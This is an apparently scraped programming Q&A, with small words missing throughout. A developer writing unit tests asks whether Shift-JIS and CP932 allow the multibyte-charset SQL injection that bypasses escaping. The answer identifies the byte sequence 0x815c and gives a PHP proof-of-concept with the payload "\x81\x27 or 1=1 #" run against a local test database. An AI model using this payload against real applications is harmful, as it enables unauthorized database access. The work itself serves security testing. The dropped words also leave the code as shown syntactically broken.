php - How to create a SQL injection attack with Shift-JIS and CP932? -

i'm writing unit tests ensure code isn't vulnerable sql injection under various charsets.

according this answer, can create vulnerability injecting \xbf\x27 using 1 of following charsets: big5, cp932, gb2312, gbk , sjis

this because if escaper not configured correctly, see 0x27 , try escape such becomes \xbf\x5c\x27. however, \xbf\x5c one character in these charsets, quote (0x27) left unescaped.

as i've discovered through testing, however, not entirely true. works big5, gb2312 , gbk neither 0xbf27 or 0xbf5c valid characters in sjis , cp932.

both

mb_strpos("abc\xbf\x27def","'",0,'sjis') 

and

mb_strpos("abc\xbf\x27def","'",0,'cp932') 

return 4. i.e., php not see \xbf\x27 single character. returns false big5, gb2312 , gbk.

also, this:

mb_strlen("\xbf\x5c",'sjis') 

returns 2 (it returns 1 gbk).

so, question is: there character sequence make sjis , cp932 vulnerable sql injection, or not vulnerable @ all? or php lying, i'm mistaken, , mysql interpret totally differently?

the devil in details ... let's start how answer in question describes list of vulnerable character sets:

for attack work, need encoding server's expecting on connection both encode ' in ascii i.e. 0x27 and have some character final byte ascii \ i.e. 0x5c. turns out, there 5 such encodings supported in mysql 5.6 default: big5, cp932, gb2312, gbk , sjis. we'll select gbk here.

this gives context - 0xbf5c used example gbk, not universal character use of 5 character sets.
happens same byte sequence valid character under big5 , gb2312.

at point, question becomes easy this:

which byte sequence valid character under cp932 , sjis , ends in 0x5c?

to fair, of google searches tried these character sets don't give useful results. did find this cp932.txt file, in if search '5c ' (with space there), you'll jump line:

0x815c 0x2015 #horizontal bar

and have winner! :)

some oracle document confirms 0x815c same character both cp932 , sjis , php recognizes too:

php > var_dump(mb_strlen("\x81\x5c", "cp932"), mb_strlen("\x81\x5c", "sjis")); int(1) int(1) 

here's poc script attack:

<?php $username = 'username'; $password = 'password';  $mysqli = new mysqli('localhost', $username, $password); foreach (array('cp932', 'sjis') $charset) {         $mysqli->query("set names {$charset}");         $mysqli->query("create database {$charset}_db character set {$charset}");         $mysqli->query("use {$charset}_db");         $mysqli->query("create table foo (bar varchar(16) not null)");         $mysqli->query("insert foo (bar) values ('baz'), ('qux')");          $input = "\x81\x27 or 1=1 #";         $input = $mysqli->real_escape_string($input);         $query = "select * foo bar = '{$input}' limit 1";         $result = $mysqli->query($query);         if ($result->num_rows > 1)         {                 echo "{$charset} exploit successful!\n";         }          $mysqli->query("drop database {$charset}_db"); }